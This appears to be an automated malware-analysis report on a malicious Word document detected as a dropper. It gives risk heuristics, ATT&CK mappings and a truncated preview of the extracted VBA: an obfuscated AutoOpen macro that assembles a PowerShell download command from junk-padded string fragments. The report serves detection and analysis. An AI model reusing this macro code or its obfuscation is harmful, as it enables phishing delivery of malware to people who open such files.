MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The file contains a VBA macro with an AutoOpen function, which is a common technique for executing malicious code upon opening the document. The macro utilizes a Shell() call, indicating it's designed to execute an external payload. ClamAV identifies the file as 'Doc.Dropper.Agent-6447747-0', suggesting its purpose is to drop or download further malware. The obfuscated script makes it difficult to determine the exact payload, but the overall behavior points to a dropper.
Heuristics 7
-
ClamAV: Doc.Dropper.Agent-6447747-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6447747-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 24826 bytes |
SHA-256: f08ff0de306d14b68b71b2cffc2bdec3e6b4b7f827cebc2be781777f038e3383 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "IsLhzhocwqWjLE"
Sub AutoOpen()
On Error Resume Next
zqYkizjRQ = tzU - Sgn(WhMbcLRqTKpPLY) - (8827269 - Tan(7749295) / 7594660 - ChrW(wqpfSjSXN))
THdTiJMtK = WIJwGWNvSlI - Sgn(cQPBdGqO) - (5562509 - Tan(1818684) / 875102 - ChrW(wjqrKFzfjERVms))
iJFozmFvf = DdjFD - Sgn(GMDLAXfVkMmco) - (4491287 - Tan(9773693) / 8781053 - ChrW(lYhJoJ))
Application.Run "HkbtiqAzm", VZUfKwITAk
StCDdnhZt = owERbrLdj - Sgn(nzc) - (1486044 - Tan(1613008) / 2722625 - ChrW(OuhVm))
RDlSwUBiD = tAzZubmuNDal - Sgn(SQuuPdSi) - (2158229 - Tan(1206464) / 377058 - ChrW(BjJsqbAzzG))
bHjTibAUS = jjTBE - Sgn(mEkIiuws) - (8658070 - Tan(9210880) / 5708613 - ChrW(WbZ))
End Sub
Function VZUfKwITAk()
On Error Resume Next
QiGavkiL = NZaO - Sgn(IbYPkkTV) - (2434647 - Tan(5409411) / 1640903 - ChrW(wTJYrm))
zvZpn = UJJcK - Sgn(voorrkZiXE) - (3845859 - Tan(4340050) / 1354472 - ChrW(BORwrHiBQfhWnP))
vsNnGTOmiz = OwwOjpvidVrif - Sgn(OpCkmKFsK) - (7106670 - Tan(410447) / 9446648 - ChrW(YJKVzKoIGVIXK))
ntNhCSESz = WzCvVwacv + Mid(dzFJAwvM + "fSwYqruuW7+aW7V.exi3uV+3uVMVaW7+aW7+aW7+aW'+'7iaW7+'+'ahXz'+'+hXzW7MaW7+aW7Veiah'+'X'+'z+hXzW7+aW7MV);fo3uV+3uVaW7+aW7reaW7+aW3uV+3uV7ach('+'pTXasfc iaW7+aW7n pTXADCXaWQWTczwmrJNdRpwz" + vWklimLTQwAjp, 9, 160)
QwZXhsSOXvr = OMmvWVSzuYqT - Sgn(UuNc) - (707824 - Tan(4091334) / 948126 - ChrW(ldtTWSfjwF))
AAOVhriEr = mSHvkOjOUiFAMG - Sgn(WkYYBTRGcjtbz) - (710823 - Tan(7485029) / 3154526 - ChrW(TrjpNwcNUHkCjc))
rutpkSV = MdvvKXDfUL - Sgn(MrmjKhNGh) - (4138323 - Tan(4979375) / 656518 - ChrW(mvKhM))
VjARmd = jndzZDa + Mid(qil + "TFavKEUSUaLJX hXz+hX'+'z= iMahXz+hXzW7+aW7V aW7+aW7htt'+'3uV+3uV'+'p:aW7+ahX'+'z+hXzW7//va'+'W7hXz+hXz+aW7aDMw" + FoW, 13, 95)
JMnBXR = WTnHhF - Sgn(XNCpIfSKNZ) - (5170755 - Tan(145796) / 1976156 - ChrW(wPiOXMAbwWj))
XwzfsvzTm = NsrYWBjGDXuM - Sgn(tcBZAKHEiZ) - (722814 - Tan(1782158) / 8651629 - ChrW(tivQf))
nrQrAHRV = RSaS - Sgn(DZUEfZVRhdjz) - (520167 - Tan(9155205) / 2368827 - ChrW(liSnPdrmb))
qKzAbLHXzr = DwGMOWIrFaPL + Mid(iillb + "bCMwafoMjTaDMMzSGwQppShOm'+'E[30]+3uVx3uV)hXz) -cREPlace ([CHaR]71+[CHaR]81+[C'+'HaR]112),[CHaR]36 -cREPlace hXzZcNhXz,[CHaR]124 -RePLACEhXz3uVhXz,[CHaR'+']39) ) ') -rePlaCE 'hXz',[chaR]39 -CrEpKmQzA" + wCpZuLnalIP, 19, 182)
QGDZqYQCZOY = FLSChRS - Sgn(bokkTFXSKdwOkw) - (5297724 - Tan(6675297) / 8261254 - ChrW(DJXDFYajdjsib))
YYKGOqQ = aXrqvz - Sgn(ZCHXEfJiIjkL) - (7399383 - Tan(2521618) / 1743808 - ChrW(XjMKnbraj))
pCCavhRS = ioN - Sgn(lnrH) - (5886920 - Tan(1371600) / 2989705 - ChrW(AsQzUwHSpA))
mjZBh = GPGPaCij + Mid(lnAwzirKjJitVS + "FzRfDNQmEVOjNvdtAr]34).repLAc'+'e(aW7dB7aW7,[stRi'+'nG][CHAr]92).repLAhXz+hXzce(aW7iMVaW7hXz+hAYnVusSwta" + jjHiaahhcY, 17, 78)
zohAbLwpa = DCGhwhpzv - Sgn(cRzKwKSPlcYPvL) - (8172186 - Tan(2957485) / 2992477 - ChrW(rOzDSUtRY))
SDtNTPf = FdB - Sgn(XzNpwHPBQIf) - (1541355 - Tan(1011027) / 7699720 - ChrW(vqjS))
zBYbsufau = GhwYw - Sgn(RhlQJIbor) - (9527104 - Tan(9518500) / 160029 - ChrW(INpwpY))
LinJHCmzXO = wUHjoAzKh + Mid(DwUVDwzTfiBL + "iSHK+hXz+aW7.LcrToStraW'+'7+aW7BaW3uV+3uV7+aW7SsiBahXz+hXzW7+aW7SsNgLcr(),aW7+aW7 pTXaW7+aW7SDC);&aW7+TiXjJTPauVkkAPP" + iTtpHvSNLiXRk, 5, 98)
ITSZQVTuR = QjIAoNLXIFkwmJ - Sgn(wIJ) - (9254196 - Tan(3384595) / 6026738 - ChrW(wrAdwJzfV))
Ejzio = ApOHq - Sgn(CHiKHtOauHuL) - (8016865 - Tan(6126225) / 3736877 - ChrW(UqkRzKPCXdkbv))
pDfYJOJ = vuHTHomUSFdZiq - Sgn(npppIV) - (4677819 - Tan(4353105) / 4872268 - ChrW(srcmiImfzMAE))
cNDKrKI = PFJdKYLo + Mid(qzpqVqhPzw + "IIQujNrPnZKQnaW7hXz+hXz,[stRinG]3uV+3uV[CHAr]96).repLAc'+'e(([CHAr]112+[CHAr]84+3uV+3uV'+'[ChXz+hXzHAr]88)'+',aW73u'+'V+3uV8xkaW7).rhXz+hXzepLAce(aW7Lcra3'+'uV+3'+'uVW7,[stR3uV+3uVinG][CHLlw" + jRwJwpPK, 14, 174)
amwIRpwM = iOjTQLCVArk - Sgn(QSoCqM) - (318611 - Tan(8391577) / 4225754 - ChrW(cXsJhvQjhwfq))
AukIOZJYPM =
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.